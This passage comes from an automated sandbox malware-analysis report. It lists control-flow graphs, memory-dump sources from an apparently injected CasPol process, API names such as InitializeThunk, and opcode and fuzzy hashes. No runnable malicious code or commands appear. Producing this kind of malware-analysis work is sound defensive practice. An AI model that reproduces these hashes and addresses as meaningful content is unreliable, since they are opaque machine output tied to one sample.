117->121 122 16630ba-16630bf 117->122 118->42 118->94 119->72 125 1663168-1663175 119->125 121->42 122->121 130 1663177-1663182 125->130 131 1663184 125->131 127->114 136 166313d-1663152 127->136 133 1663186-1663188 130->133 131->133 133->42 133->72 136->1 136->114 139->81 140->81 141->81 142->81
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (ogl$(ogl$(ogl$(ogl$(ogl$(ogl$,kl$,kl
                                                                                                                          • API String ID: 0-2186785662
                                                                                                                          • Opcode ID: 8ea270ae2440f07927d10b67348a28ab72cc36ff403566a8a8999b05f23cda4a
                                                                                                                          • Instruction ID: 04e7ad8481bf983699dcbbf3a2330d6740c477577ebc7a09c8e0534d5e18881a
                                                                                                                          • Opcode Fuzzy Hash: 8ea270ae2440f07927d10b67348a28ab72cc36ff403566a8a8999b05f23cda4a
                                                                                                                          • Instruction Fuzzy Hash: 7D127C30A00249DFDB24CF69C984A9EBBFABF48314F158569E509EB365DB30ED45CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1186 153f311-153f32f 1187 153f331-153f33b 1186->1187 1188 153f354-153f3da call 153ed68 LdrInitializeThunk 1186->1188 1189 153f350-153f353 1187->1189 1190 153f33d-153f34e 1187->1190 1202 153f523-153f540 call 1532b10 call 1532ca0 1188->1202 1203 153f3e0-153f3fa 1188->1203 1190->1189 1217 153f545-153f54e 1202->1217 1203->1202 1206 153f400-153f41a 1203->1206 1210 153f420 1206->1210 1211 153f41c-153f41e 1206->1211 1213 153f423-153f47e call 153d8b4 1210->1213 1211->1213 1224 153f480-153f482 1213->1224 1225 153f484 1213->1225 1226 153f487-153f521 call 153d8b4 1224->1226 1225->1226 1226->1217
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823662128.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1530000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: LRgl$LRgl
                                                                                                                          • API String ID: 2994545307-478734784
                                                                                                                          • Opcode ID: 6b14fc023760ca66195fa1c6b3234dbcfa36e91bb6264284adda368ea55ff88c
                                                                                                                          • Instruction ID: b86063f1dc2e23f41a3232169a513f447ea527cec82573d5ae8bd9db942f315e
                                                                                                                          • Opcode Fuzzy Hash: 6b14fc023760ca66195fa1c6b3234dbcfa36e91bb6264284adda368ea55ff88c
                                                                                                                          • Instruction Fuzzy Hash: 8051AF71A043059FCB04DFB4C884AEE77F6BF89204F04856AE505DB395DB74EC4987A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1244 153f370-153f3da call 153ed68 LdrInitializeThunk 1253 153f523-153f540 call 1532b10 call 1532ca0 1244->1253 1254 153f3e0-153f3fa 1244->1254 1268 153f545-153f54e 1253->1268 1254->1253 1257 153f400-153f41a 1254->1257 1261 153f420 1257->1261 1262 153f41c-153f41e 1257->1262 1264 153f423-153f47e call 153d8b4 1261->1264 1262->1264 1275 153f480-153f482 1264->1275 1276 153f484 1264->1276 1277 153f487-153f521 call 153d8b4 1275->1277 1276->1277 1277->1268
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823662128.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1530000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: LRgl$LRgl
                                                                                                                          • API String ID: 2994545307-478734784
                                                                                                                          • Opcode ID: ba25a2b85d7167e34bf38e8ecdf621da242ce243e2c0554a1afb2747b086847e
                                                                                                                          • Instruction ID: aba936380b5a0a34bedc19c2f21dbe6c66b0be3226f8e0d36a7dec992a176c4c
                                                                                                                          • Opcode Fuzzy Hash: ba25a2b85d7167e34bf38e8ecdf621da242ce243e2c0554a1afb2747b086847e
                                                                                                                          • Instruction Fuzzy Hash: 8A51C471B002059BCB04EFB4C994AAEB7F6BF88204F048969D506AF351EF74EC49C7A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1418 166d308-166d314 1419 166d316-166d320 1418->1419 1420 166d339-166d367 1418->1420 1421 166d335-166d338 1419->1421 1422 166d322-166d333 1419->1422 1425 166d382-166d390 1420->1425 1426 166d369-166d380 call 166bdb0 1420->1426 1422->1421 1432 166d397-166d3a9 call 1661830 1425->1432 1426->1432 1435 166d3af-166d3bd 1432->1435 1436 166d629-166d649 1432->1436 1439 166d415-166d41e 1435->1439 1440 166d3bf-166d3c6 1435->1440 1441 166d666-166d679 1436->1441 1442 166d64b-166d664 1436->1442 1443 166d424-166d428 1439->1443 1444 166d54d-166d579 1439->1444 1445 166d3cc-166d3d1 1440->1445 1446 166d51a-166d546 1440->1446 1460 166d67f-166d680 1441->1460 1442->1460 1448 166d42a-166d433 1443->1448 1449 166d439-166d451 call 1661ff0 1443->1449 1486 166d580-166d5ea 1444->1486 1451 166d3d3-166d3d9 1445->1451 1452 166d3e9-166d3f7 1445->1452 1446->1444 1448->1444 1448->1449 1459 166d456-166d45d 1449->1459 1455 166d3dd-166d3e7 1451->1455 1456 166d3db 1451->1456 1466 166d400-166d410 1452->1466 1467 166d3f9-166d3fb 1452->1467 1455->1452 1456->1452 1462 166d477-166d47b 1459->1462 1463 166d45f-166d472 call 1664da8 1459->1463 1470 166d5f1-166d622 call 1661ff0 1462->1470 1471 166d481-166d485 1462->1471 1472 166d510-166d517 1463->1472 1466->1472 1467->1472 1470->1436 1471->1470 1478 166d48b-166d496 1471->1478 1478->1470 1483 166d49c-166d4c8 call 1661ff0 1478->1483 1483->1470 1490 166d4ce-166d4e9 call 1664da8 1483->1490 1486->1470 1490->1486 1494 166d4ef-166d508 call 16658f8 1490->1494 1494->1470 1499 166d50e 1494->1499 1499->1472
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,kl$,kl$Hkl$Hkl
                                                                                                                          • API String ID: 0-3915565302
                                                                                                                          • Opcode ID: 48ce22a6733a26915429b46a9d74a64f728f5360b16dd8c37eab6e4c55b3a2fa
                                                                                                                          • Instruction ID: b5bba6a31e1f837bfd8431cd8539876140e3de1c2a11c5bc7929fc535d741352
                                                                                                                          • Opcode Fuzzy Hash: 48ce22a6733a26915429b46a9d74a64f728f5360b16dd8c37eab6e4c55b3a2fa
                                                                                                                          • Instruction Fuzzy Hash: 5B91CF70B001159FDB05DFA8CC94BAE7BAAAFC9344F158029E609DB391DF71DC528B92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1505 1662d4f-1662d75 1507 16631a4-16631a8 1505->1507 1508 1662d7b-1662d9e 1505->1508 1509 16631c1-16631cf 1507->1509 1510 16631aa-16631be 1507->1510 1517 1662da4-1662db1 1508->1517 1518 1662e4c-1662e50 1508->1518 1514 1663240-1663255 1509->1514 1515 16631d1 1509->1515 1525 1663257-166325a 1514->1525 1526 166325c-1663269 1514->1526 1520 16631db-16631e6 1515->1520 1530 1662db3-1662dbe 1517->1530 1531 1662dc0 1517->1531 1521 1662e52-1662e60 1518->1521 1522 1662e98-1662ea1 1518->1522 1527 16631ed-16631fa 1520->1527 1528 16631e8-16631eb 1520->1528 1521->1522 1539 1662e62-1662e7d 1521->1539 1523 16632b7 1522->1523 1524 1662ea7-1662eb1 1522->1524 1538 16632bc-16632d7 1523->1538 1524->1507 1532 1662eb7-1662ec0 1524->1532 1533 166326b-16632a6 1525->1533 1526->1533 1534 16631fc-166323d 1527->1534 1528->1534 1542 1662dc2-1662dc4 1530->1542 1531->1542 1536 1662ec2-1662ec7 1532->1536 1537 1662ecf-1662edb 1532->1537 1578 16632ad-16632b4 1533->1578 1536->1537 1537->1538 1545 1662ee1-1662ee7 1537->1545 1563 1662e7f-1662e89 1539->1563 1564 1662e8b 1539->1564 1542->1518 1544 1662dca-1662e2c 1542->1544 1588 1662e32-1662e49 1544->1588 1589 1662e2e 1544->1589 1548 166318e-1663192 1545->1548 1549 1662eed-1662efd 1545->1549 1548->1523 1553 1663198-166319e 1548->1553 1561 1662f11-1662f13 1549->1561 1562 1662eff-1662f0f 1549->1562 1553->1507 1553->1532 1565 1662f16-1662f1c 1561->1565 1562->1565 1566 1662e8d-1662e8f 1563->1566 1564->1566 1565->1548 1568 1662f22-1662f31 1565->1568 1566->1522 1569 1662e91 1566->1569 1574 1662f37 1568->1574 1575 1662fdf-166300a call 1662b88 * 2 1568->1575 1569->1522 1577 1662f3a-1662f4b 1574->1577 1592 16630f4-166310e 1575->1592 1593 1663010-1663014 1575->1593 1577->1538 1581 1662f51-1662f63 1577->1581 1581->1538 1583 1662f69-1662f81 1581->1583 1645 1662f83 call 166bd60 1583->1645 1646 1662f83 call 166bdb0 1583->1646 1647 1662f83 call 166be00 1583->1647 1648 1662f83 call 166b439 1583->1648 1587 1662f89-1662f99 1587->1548 1591 1662f9f-1662fa2 1587->1591 1588->1518 1589->1588 1594 1662fa4-1662faa 1591->1594 1595 1662fac-1662faf 1591->1595 1592->1507 1613 1663114-1663118 1592->1613 1593->1548 1597 166301a-166301e 1593->1597 1594->1595 1598 1662fb5-1662fb8 1594->1598 1595->1523 1595->1598 1600 1663046-166304c 1597->1600 1601 1663020-166302d 1597->1601 1602 1662fc0-1662fc3 1598->1602 1603 1662fba-1662fbe 1598->1603 1604 1663087-166308d 1600->1604 1605 166304e-1663052 1600->1605 1618 166302f-166303a 1601->1618 1619 166303c 1601->1619 1602->1523 1606 1662fc9-1662fcd 1602->1606 1603->1602 1603->1606 1608 166308f-1663093 1604->1608 1609 1663099-166309f 1604->1609 1605->1604 1610 1663054-166305d 1605->1610 1606->1523 1612 1662fd3-1662fd9 1606->1612 1608->1578 1608->1609 1616 16630a1-16630a5 1609->1616 1617 16630ab-16630ad 1609->1617 1614 166305f-1663064 1610->1614 1615 166306c-1663082 1610->1615 1612->1575 1612->1577 1620 1663154-1663158 1613->1620 1621 166311a-1663124 1613->1621 1614->1615 1615->1548 1616->1548 1616->1617 1622 16630e2-16630e4 1617->1622 1623 16630af-16630b8 1617->1623 1624 166303e-1663040 1618->1624 1619->1624 1620->1578 1625 166315e-1663162 1620->1625 1621->1620 1633 1663126-166313b 1621->1633 1622->1548 1629 16630ea-16630f1 1622->1629 1627 16630c7-16630dd 1623->1627 1628 16630ba-16630bf 1623->1628 1624->1548 1624->1600 1625->1578 1631 1663168-1663175 1625->1631 1627->1548 1628->1627 1636 1663177-1663182 1631->1636 1637 1663184 1631->1637 1633->1620 1642 166313d-1663152 1633->1642 1639 1663186-1663188 1636->1639 1637->1639 1639->1548 1639->1578 1642->1507 1642->1620 1645->1587 1646->1587 1647->1587 1648->1587
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (ogl$(ogl$(ogl$(ogl
                                                                                                                          • API String ID: 0-3238647451
                                                                                                                          • Opcode ID: bf12de769a2cf541305369dbc587e7282e56de1ec65ae9cc64703e3245374017
                                                                                                                          • Instruction ID: ef0c51b7dc2bd229c2b2931fdc16ceaa3f4e4eb10a7dc70a0e5c2a5edae77bc0
                                                                                                                          • Opcode Fuzzy Hash: bf12de769a2cf541305369dbc587e7282e56de1ec65ae9cc64703e3245374017
                                                                                                                          • Instruction Fuzzy Hash: A8C16C30A00249DFCB14CF69C984A9EBBFABF48314F158559E919EB365D731ED41CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1649 1664220-166470e 1724 1664714-1664724 1649->1724 1725 1664c60-1664c95 1649->1725 1724->1725 1726 166472a-166473a 1724->1726 1729 1664c97-1664c9c 1725->1729 1730 1664ca1-1664cbf 1725->1730 1726->1725 1728 1664740-1664750 1726->1728 1728->1725 1731 1664756-1664766 1728->1731 1732 1664d86-1664d8b 1729->1732 1743 1664d36-1664d42 1730->1743 1744 1664cc1-1664ccb 1730->1744 1731->1725 1733 166476c-166477c 1731->1733 1733->1725 1735 1664782-1664792 1733->1735 1735->1725 1736 1664798-16647a8 1735->1736 1736->1725 1738 16647ae-16647be 1736->1738 1738->1725 1739 16647c4-16647d4 1738->1739 1739->1725 1741 16647da-16647ea 1739->1741 1741->1725 1742 16647f0-1664c5f 1741->1742 1748 1664d44-1664d50 1743->1748 1749 1664d59-1664d65 1743->1749 1744->1743 1750 1664ccd-1664cd9 1744->1750 1748->1749 1758 1664d52-1664d57 1748->1758 1759 1664d67-1664d73 1749->1759 1760 1664d7c-1664d7e 1749->1760 1755 1664cfe-1664d01 1750->1755 1756 1664cdb-1664ce6 1750->1756 1761 1664d03-1664d0f 1755->1761 1762 1664d18-1664d24 1755->1762 1756->1755 1769 1664ce8-1664cf2 1756->1769 1758->1732 1759->1760 1771 1664d75-1664d7a 1759->1771 1760->1732 1761->1762 1774 1664d11-1664d16 1761->1774 1766 1664d26-1664d2d 1762->1766 1767 1664d8c-1664dd8 1762->1767 1766->1767 1768 1664d2f-1664d34 1766->1768 1868 1664ddb call 1664f60 1767->1868 1869 1664ddb call 1664f50 1767->1869 1768->1732 1769->1755 1777 1664cf4-1664cf9 1769->1777 1771->1732 1774->1732 1777->1732 1779 1664de1-1664de8 1781 1664dea-1664df5 1779->1781 1782 1664dfb-1664e06 1779->1782 1781->1782 1787 1664e7e-1664ed0 1781->1787 1788 1664ed7-1664f1c call 1663890 1782->1788 1789 1664e0c-1664e7b 1782->1789 1787->1788 1806 1664f1e-1664f2b 1788->1806 1807 1664f2d-1664f3b 1788->1807 1813 1664f4b-1664f4e 1806->1813 1814 1664f3d-1664f47 1807->1814 1815 1664f49 1807->1815 1814->1813 1815->1813 1868->1779 1869->1779
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (ogl$$gl$$gl
                                                                                                                          • API String ID: 0-2638181815
                                                                                                                          • Opcode ID: 66c422a12270104d5cc5c1adc7f0a12829894cceba60b1ff4b86683d9da4f89e
                                                                                                                          • Instruction ID: b225e00899c7bff42145dff0467d5afd138ae9e0818196ac7ba47737f5b5279a
                                                                                                                          • Opcode Fuzzy Hash: 66c422a12270104d5cc5c1adc7f0a12829894cceba60b1ff4b86683d9da4f89e
                                                                                                                          • Instruction Fuzzy Hash: 81727374A052588FEB64DFA4C860BAEB776EF88304F5180B9D20A6B755CF34AD42CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Xkl$Xkl
                                                                                                                          • API String ID: 0-3015996877
                                                                                                                          • Opcode ID: 1ef53952a2503c3a42dee4ea504199e5b841a0dc42cae7af90eab8819dc511cc
                                                                                                                          • Instruction ID: bd464871b7b2c8862bb8f8082f1a4f3402f256fbde6914b2195591b3d6c30307
                                                                                                                          • Opcode Fuzzy Hash: 1ef53952a2503c3a42dee4ea504199e5b841a0dc42cae7af90eab8819dc511cc
                                                                                                                          • Instruction Fuzzy Hash: 02623E7699A702CBD352EFA4C51209AB7B3FF92360F61C67EC85617915F372A842C360
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: fll$PHgl
                                                                                                                          • API String ID: 0-2921421964
                                                                                                                          • Opcode ID: 6ab07936441d5438787d263a45bd3be0b5ca9f9e864c174b8028a1e02fc8260b
                                                                                                                          • Instruction ID: 245700736384031d89f58f81195ec9c8c5912d1c63a191f9b9ee529695ff630e
                                                                                                                          • Opcode Fuzzy Hash: 6ab07936441d5438787d263a45bd3be0b5ca9f9e864c174b8028a1e02fc8260b
                                                                                                                          • Instruction Fuzzy Hash: 3C415134B00225CFDB54DBB5C55877E7AFAAB88280F144429D806EB794DF74DC468B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Hkl$Hkl
                                                                                                                          • API String ID: 0-68538764
                                                                                                                          • Opcode ID: 7f24185483f303c53ccefb9e7f33a13802027915fc55dbea25f84ecb7f8bd814
                                                                                                                          • Instruction ID: 59d16f7377f9f734c328d00e9926cc8ec06e2dfb684ef017eebac84981eb5925
                                                                                                                          • Opcode Fuzzy Hash: 7f24185483f303c53ccefb9e7f33a13802027915fc55dbea25f84ecb7f8bd814
                                                                                                                          • Instruction Fuzzy Hash: 2E41C0752042589FDB168F24CC94AAE3FF6FBCA314F068459E9059B391CB39DC12CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 12946465770b1b5b9c16d2dbe3a1672b68ad5d5c352d7b6bac63f694ec6d1543
                                                                                                                          • Instruction ID: 4f63a9316973eba93af44e8c48fca38a65576db63de30d447c17a130a2919cf2
                                                                                                                          • Opcode Fuzzy Hash: 12946465770b1b5b9c16d2dbe3a1672b68ad5d5c352d7b6bac63f694ec6d1543
                                                                                                                          • Instruction Fuzzy Hash: 52A212B4A01228CFDB64EF20CA8879DB7B6BF88205F5084E9D54AA3744DB359EC5CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 17f7dd2d5057c6ffacadad9409bba6910fd6a6ac8541eadcac03e0dc65f658d1
                                                                                                                          • Instruction ID: 14f0a0220cb443e0eb070fc7e5220a7af1d81e5d13614cb029dbfbf763cef57c
                                                                                                                          • Opcode Fuzzy Hash: 17f7dd2d5057c6ffacadad9409bba6910fd6a6ac8541eadcac03e0dc65f658d1
                                                                                                                          • Instruction Fuzzy Hash: FB6214B4A01224CFDB69AF60CA8879DB7B6BF48205F5084E9D509A3744CF369EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 7a5b9bc819f0ddb49d4d1782a6936db1dd26a8512fac6438062712acd52d48ff
                                                                                                                          • Instruction ID: ff2a3ce6fcb8d30c3189bc465037fdb051629406f8a72b6c6b15f83656818999
                                                                                                                          • Opcode Fuzzy Hash: 7a5b9bc819f0ddb49d4d1782a6936db1dd26a8512fac6438062712acd52d48ff
                                                                                                                          • Instruction Fuzzy Hash: 325213B4A01224CFDB68AF60CA8879DB7B6BF48205F5084E9D549A3744CF369EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 49f21b138ee6f8fd58b67338cca7832ae7c334c9483c4989e601a3d3adaf3b47
                                                                                                                          • Instruction ID: 531bcec18de7821e5b1e889732b2d2d009285aa46a7b5c60f9df5263288be9a3
                                                                                                                          • Opcode Fuzzy Hash: 49f21b138ee6f8fd58b67338cca7832ae7c334c9483c4989e601a3d3adaf3b47
                                                                                                                          • Instruction Fuzzy Hash: F95214B4A01224CFDB68AF60CA9879DB7B6BF48205F5084E9D509A3744CF369EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: de209f6d123ac5dae76b2f4bbb8c569199628a25a0bafa80e1bbfa57742fe4cd
                                                                                                                          • Instruction ID: e0739a05ba4922fcdf136f0f4ada4b18ca8f056aec39336c8a8a29e939fba5f1
                                                                                                                          • Opcode Fuzzy Hash: de209f6d123ac5dae76b2f4bbb8c569199628a25a0bafa80e1bbfa57742fe4cd
                                                                                                                          • Instruction Fuzzy Hash: 865214B4A01224CFDB68AF60CA9879DB7B6BF48205F5084E9D509A3744CF369EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 23bc97edb1cf9b0a6ba99244c2348227623c1cbe3ac4d3719dc3ac1dc84940b3
                                                                                                                          • Instruction ID: b90cc0b501c4aa9840aa5e591bbc950f8706e68c998229dc96205bdbb7f7b03b
                                                                                                                          • Opcode Fuzzy Hash: 23bc97edb1cf9b0a6ba99244c2348227623c1cbe3ac4d3719dc3ac1dc84940b3
                                                                                                                          • Instruction Fuzzy Hash: 055214B4A01224CFDB68EF60CA8879DB7B6BF48205F5084E9D549A3744CB369EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 5dfa2f2207f768c2b710cf534e5c5c58b2d8ed2e5658f6421895f12d57b55909
                                                                                                                          • Instruction ID: b2ab4a44b14563a0114fcff08dba2524bfbf81d9501dfe3c0f068ec040034b07
                                                                                                                          • Opcode Fuzzy Hash: 5dfa2f2207f768c2b710cf534e5c5c58b2d8ed2e5658f6421895f12d57b55909
                                                                                                                          • Instruction Fuzzy Hash: AA5214B4A01224CFDB68AF60CA8879DB7B6BF48205F5084E9D549A3744CF369EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 6b2fe83462070b012939ef9a578805007ea0b27f900e7ab64b75b4843859b84a
                                                                                                                          • Instruction ID: 409d63ce6efce87355ac3c4649baac8e7eaafbb61b04b8b8be785aa7c804102a
                                                                                                                          • Opcode Fuzzy Hash: 6b2fe83462070b012939ef9a578805007ea0b27f900e7ab64b75b4843859b84a
                                                                                                                          • Instruction Fuzzy Hash: D25215B4A01224CFDB68AF60CA8879DB7B6BF48205F5084E9D549A3744CF369EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 71e6b8d09bf58e42e244123e6d01c7e415e9d14a5d5a3ce9edc6fcf6a44347ef
                                                                                                                          • Instruction ID: 476967f7a68ebecca6011d21d79681eb9d168edb5ed0ee63de72e7467e287236
                                                                                                                          • Opcode Fuzzy Hash: 71e6b8d09bf58e42e244123e6d01c7e415e9d14a5d5a3ce9edc6fcf6a44347ef
                                                                                                                          • Instruction Fuzzy Hash: 115215B4A01224CFDB68AF60CA8879DB7B6BF88205F5084E9D509A3744CF359EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
